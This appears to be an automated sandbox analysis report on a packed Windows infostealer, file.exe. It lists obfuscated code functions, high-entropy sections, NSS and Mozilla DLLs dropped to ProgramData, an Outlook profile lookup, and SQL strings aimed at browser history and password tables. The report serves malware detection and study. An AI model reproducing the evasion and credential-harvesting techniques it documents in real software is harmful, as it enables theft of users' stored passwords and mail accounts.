Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CBFB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB8C0 rand_s,NtQueryVirtualMemory,	0_2_6CBFB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CBFB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CB9F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF	0_2_00ACF0EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0	0_2_00B2D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B28921	0_2_00B28921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB6909	0_2_00AB6909
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B312CE	0_2_00B312CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2527B	0_2_00B2527B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2727D	0_2_00A2727D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4E3FA	0_2_00A4E3FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2F3CB	0_2_00B2F3CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B39337	0_2_00B39337
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B344FE	0_2_00B344FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4742E	0_2_00C4742E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B26DBB	0_2_00B26DBB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B35D31	0_2_00B35D31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2BEA5	0_2_00B2BEA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8BEC1	0_2_00A8BEC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B37E15	0_2_00B37E15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB935A0	0_2_6CB935A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF34A0	0_2_6CBF34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFC4A0	0_2_6CBFC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA6C80	0_2_6CBA6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD6CF0	0_2_6CBD6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9D4E0	0_2_6CB9D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD4D0	0_2_6CBBD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA64C0	0_2_6CBA64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0545C	0_2_6CC0545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD5C10	0_2_6CBD5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE2C10	0_2_6CBE2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0AC00	0_2_6CC0AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0542B	0_2_6CC0542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA5440	0_2_6CBA5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF85F0	0_2_6CBF85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD0DD0	0_2_6CBD0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBED10	0_2_6CBBED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC0512	0_2_6CBC0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAFD00	0_2_6CBAFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF4EA0	0_2_6CBF4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC076E3	0_2_6CC076E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB5E90	0_2_6CBB5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFE680	0_2_6CBFE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9BEF0	0_2_6CB9BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAFEF0	0_2_6CBAFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF9E30	0_2_6CBF9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC06E63	0_2_6CC06E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD7E10	0_2_6CBD7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE5600	0_2_6CBE5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9C670	0_2_6CB9C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9E50	0_2_6CBB9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD3E50	0_2_6CBD3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE2E4E	0_2_6CBE2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB4640	0_2_6CBB4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE77A0	0_2_6CBE77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC6FF0	0_2_6CBC6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9DFE0	0_2_6CB9DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD7710	0_2_6CBD7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA9F00	0_2_6CBA9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC050C7	0_2_6CC050C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC60A0	0_2_6CBC60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBC0E0	0_2_6CBBC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD58E0	0_2_6CBD58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDB820	0_2_6CBDB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE4820	0_2_6CBE4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA7810	0_2_6CBA7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDF070	0_2_6CBDF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB8850	0_2_6CBB8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD850	0_2_6CBBD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCD9B0	0_2_6CBCD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9C9A0	0_2_6CB9C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD5190	0_2_6CBD5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF2990	0_2_6CBF2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0B170	0_2_6CC0B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEB970	0_2_6CBEB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAD960	0_2_6CBAD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA940	0_2_6CBBA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBACAB0	0_2_6CBACAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB922A0	0_2_6CB922A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC4AA0	0_2_6CBC4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB1AF0	0_2_6CBB1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDE2F0	0_2_6CBDE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0BA90	0_2_6CC0BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC02AB0	0_2_6CC02AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD8AC0	0_2_6CBD8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD9A60	0_2_6CBD9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC053C8	0_2_6CC053C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9F380	0_2_6CB9F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDD320	0_2_6CBDD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAC370	0_2_6CBAC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB95340	0_2_6CB95340

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 007645C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBD94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBCCBE8 appears 134 times

Source: file.exe, 00000000.00000002.1667191321.000000006CE15000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: exbnbhbd ZLIB complexity 0.9948048289453832

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBF7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CBF7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00779600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00773720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00773720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\J6VYLJQS.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT url FROM moz_places LIMIT 1000f;q
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1510103828.000000001D780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1496044503.000000001D764000.00000004.00000020.00020000.00000000.sdmp, AKKKFBGDHJKFHJJJJDGC.0.dr, AFCBFIJEHDHCBGDGDGCB.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1853440 > 1048576

Source: file.exe

Static PE information: Raw size of exbnbhbd is bigger than: 0x100000 < 0x19e400

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.760000.0.unpack :EW;.rsrc :W;.idata :W; :EW;exbnbhbd:EW;krctzlzf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;exbnbhbd:EW;krctzlzf:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00779860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c4c58 should be: 0x1d3f0e

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: exbnbhbd
Source: file.exe	Static PE information: section name: krctzlzf
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C188E9 push edx; mov dword ptr [esp], ebp	0_2_00C1890F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C188E9 push esi; mov dword ptr [esp], eax	0_2_00C1891F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push edx; mov dword ptr [esp], 2993B214h	0_2_00A920D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 274B5F8Fh; mov dword ptr [esp], edx	0_2_00A920F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 2CE25BCAh; mov dword ptr [esp], edi	0_2_00A92204
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 41D85D98h; mov dword ptr [esp], edi	0_2_00A92302
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push eax; mov dword ptr [esp], edx	0_2_00A9231F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6894 push ebp; mov dword ptr [esp], edx	0_2_00AA6940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6894 push edx; mov dword ptr [esp], eax	0_2_00AA6995
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0077B035 push ecx; ret	0_2_0077B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push eax; mov dword ptr [esp], 26BFC402h	0_2_00ACF15E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push ecx; mov dword ptr [esp], esi	0_2_00ACF187
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push edi; mov dword ptr [esp], F00C9201h	0_2_00ACF1CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA08CB push ebp; mov dword ptr [esp], edx	0_2_00BA0983
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA08CB push ebp; mov dword ptr [esp], eax	0_2_00BA09E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 3DADE61Dh; mov dword ptr [esp], ecx	0_2_00B2D8CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 434890FBh; mov dword ptr [esp], edi	0_2_00B2D8EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ebp; mov dword ptr [esp], eax	0_2_00B2D8F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push esi; mov dword ptr [esp], ebx	0_2_00B2D979
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 169C3BECh; mov dword ptr [esp], esi	0_2_00B2D9B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push esi; mov dword ptr [esp], edi	0_2_00B2DA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 57922002h; mov dword ptr [esp], ecx	0_2_00B2DA6F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ebx; mov dword ptr [esp], 051C2B00h	0_2_00B2DADF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ecx; mov dword ptr [esp], 6E6DEFF6h	0_2_00B2DAEA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push eax; mov dword ptr [esp], esp	0_2_00B2DB27
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 701F7537h; mov dword ptr [esp], edi	0_2_00B2DC74
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push edi; mov dword ptr [esp], 3FDFFC24h	0_2_00B2DC78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push edx; mov dword ptr [esp], ebp	0_2_00B2DCF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 2FCD5FD7h; mov dword ptr [esp], eax	0_2_00B2DD04
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push eax; mov dword ptr [esp], edi	0_2_00B2DDC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 5EADB701h; mov dword ptr [esp], edx	0_2_00B2DE30

Source: file.exe

Static PE information: section name: exbnbhbd entropy: 7.953344026869935

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	Jump to dropped file
